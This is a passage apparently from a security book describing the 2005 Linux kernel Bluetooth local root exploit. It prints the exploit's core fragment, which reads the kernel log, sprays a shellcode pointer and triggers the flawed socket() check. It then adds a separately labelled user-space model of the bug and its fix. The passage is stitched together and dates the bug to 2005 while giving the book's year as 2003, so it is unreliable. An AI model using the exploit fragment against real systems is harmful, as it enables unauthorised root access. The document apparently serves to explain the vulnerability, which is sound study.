Kernel Bluetooth Local Root Exploit for Linux

A small Bluetooth chip speaks rather complicated communications protocols, and supporting them takes a great deal of time and effort. Practically no development team has managed to keep new holes out of such code, holes through which an elephant could pass, never mind a worm. Linux was no exception: in April 2005 a report of the hole was published, and soon afterwards the Kernel Bluetooth Local Root exploit appeared, working on kernels including 2.6.4-52 and 2.6.11.

The developers' error lay in how the kernel chose the handler for a new Bluetooth socket. The protocol number passed as the third argument of socket() selects an entry from a small table of protocol descriptors, and the check on that number was incomplete, so a value outside the table made the kernel fetch a descriptor pointer from wherever the out-of-range index happened to land. In the case the exploit hunts for, that pointer lands in the process's own user memory, which the hacker can fill at will. One field of such a descriptor is a pointer to the code the kernel calls to create the socket. Under normal conditions it points into the kernel's Bluetooth support code, but nothing could be easier than redirecting it to shellcode.

The key fragment of the exploit, the part that turns an unprivileged process into root, is shown in Listing 14.1. The listing is a copy of the exploit source published at http://www.securiteam.com/exploits/5KPOFOAFFO.html.

Listing 14.1: Key fragment of the Kernel Bluetooth Local Root exploit

    /* Fragment of the exploit's main loop. buf, check, tmp, mod, sock, arg and
       ong_code (the shellcode) are declared earlier in the full source, which
       needs <stdio.h>, <stdlib.h>, <string.h>, <sys/klog.h> and <sys/socket.h>.
       The original makes no NULL check on the result of strstr(). */
    if ((tmp = klogctl(0x3, buf, 1700)) > -1) {          /* read the kernel log ring buffer */
        check = strstr(buf, "ecx: ");                    /* register dump left by the last oops */
        printf(" - [%0.14s]\n", check);
        if (*(check+5) == 0x30 && *(check+6) == 0x38) {  /* ecx starts with "08": a user-space address */
            check += 5;
            printf(" - suitable value found! using 0x%0.9s\n", check);
            printf(" - the time has come to push the button... check your id!\n");
            *(check+9) = 0x00;                           /* terminate the string just past the value */
            *(--check) = 'x';                            /* prefix "0x" so strtoul(..., 0) parses hex */
            *(--check) = '0';
            mod = (unsigned int*)strtoul(check, 0, 0);   /* the address the kernel will dereference */
            for (sock = 0; sock <= 200; sock++)
                *(mod++) = (int)ong_code;                /* fill it with the shellcode address */
            if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { /* make the kernel take the pointer */
                printf(" - something went wrong (invalid value) \n");
                exit(1);
            }
        }
    }
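The three things the listing relies on, as an added user-space model that is not code from the book or from the SecuriTeam exploit it quotes: the one-sided protocol check (shaped after the pre-fix kernel check for this bug, CVE-2005-0750, and simplified), the oops-log parse that recovers ecx, and the "spray" of one function pointer over a region whose layout is unknown. The oops text, the table layout and every name here are constructed stand-ins; nothing touches a real kernel.

```c
/* Added example, not code from the book or from the SecuriTeam exploit it
 * quotes: a user-space model of what the listing relies on. The one-sided
 * bounds check is shaped after the pre-fix kernel check for this bug
 * (CVE-2005-0750), simplified; the oops text, table layout and all names
 * are constructed stand-ins, and nothing here touches a real kernel. */
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define BT_MAX_PROTO 8          /* size of the model's protocol table */
#define SPRAY_WORDS  201        /* the listing writes words 0..200 */

typedef int (*create_fn)(void);

struct bt_proto_model {
    create_fn create;           /* the pointer the kernel calls on socket() */
};

/* One backing object, so that a negative index still lands inside allocated
 * memory: four "junk" words precede the table, as in a real data segment. */
static struct bt_proto_model *g_mem[4 + BT_MAX_PROTO];
#define bt_proto (g_mem + 4)

/* Constructed stand-in for the process's 0x08xxxxxx data region. */
static create_fn g_user_region[SPRAY_WORDS];

static int fake_shellcode(void) { return 0x1337; }   /* stands in for ong_code */

/* Pre-fix shape of the check: a signed proto is compared only against the
 * upper bound, so socket(AF_BLUETOOTH, SOCK_RAW, -1) reads bt_proto[-1]. */
static int lookup_vulnerable(int proto, struct bt_proto_model **out)
{
    if (proto >= BT_MAX_PROTO)
        return -1;                          /* EINVAL */
    *out = bt_proto[proto];
    return 0;
}

/* The corrected check rejects negative values as well. */
static int lookup_fixed(int proto, struct bt_proto_model **out)
{
    if (proto < 0 || proto >= BT_MAX_PROTO)
        return -1;
    *out = bt_proto[proto];
    return 0;
}

/* Parse "ecx: XXXXXXXX" from oops text as the listing does, with the bounds
 * the listing skips. Returns the value if it lies in the 0x08xxxxxx range the
 * exploit waits for, and 0 otherwise. */
unsigned long find_user_ecx(const char *log)
{
    const char *p = strstr(log, "ecx: ");
    char hex[9];
    if (!p)
        return 0;
    p += 5;
    for (int i = 0; i < 8; i++) {           /* exactly eight hex digits */
        if (!isxdigit((unsigned char)p[i]))
            return 0;
        hex[i] = p[i];
    }
    hex[8] = '\0';
    unsigned long v = strtoul(hex, NULL, 16);
    return (v >> 24) == 0x08 ? v : 0;       /* the listing's '0','8' test */
}

/* Arrange the model: the words before the table point into the user region
 * (the "suitable value" the exploit hunts for), the table itself is empty,
 * and every word of the user region holds the shellcode address, so the
 * create field is hit whatever its offset turns out to be. Returns the
 * number of words sprayed. */
int setup_model(void)
{
    for (int i = 0; i < 4; i++)
        g_mem[i] = (struct bt_proto_model *)&g_user_region[i * 50];
    for (int i = 0; i < BT_MAX_PROTO; i++)
        bt_proto[i] = NULL;
    for (int i = 0; i < SPRAY_WORDS; i++)
        g_user_region[i] = fake_shellcode;
    return SPRAY_WORDS;
}

/* Model of the kernel's socket(AF_BLUETOOTH, SOCK_RAW, proto) path.
 * Returns -1 for EINVAL, -2 where the real kernel would oops on a NULL
 * descriptor, otherwise what create() returns (0x1337: the spray was hit). */
int socket_model(int proto, int fixed)
{
    struct bt_proto_model *m = NULL;
    int rc = fixed ? lookup_fixed(proto, &m) : lookup_vulnerable(proto, &m);
    if (rc < 0)
        return -1;
    if (m == NULL)
        return -2;
    return m->create();
}

/* Constructed oops fragment in the 2.6 i386 register-dump format. */
const char *SAMPLE_OOPS =
    "eax: 00000000   ebx: c037a1e0   ecx: 0804a2c0   edx: 00000001\n";
```

Call setup_model() once, then socket_model(-1, 0) reaches fake_shellcode through whatever word of the sprayed region the descriptor happens to point at, while socket_model(-1, 1) is refused before any pointer is fetched; that is the whole difference between the vulnerable and the fixed check. The spray of every word, rather than one, is what frees the exploit from knowing the offset of the create field inside the descriptor.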
 


Shellcoder's Programming Uncovered (Uncovered series)
ISBN: 193176946X
Year: 2003
Pages: 164
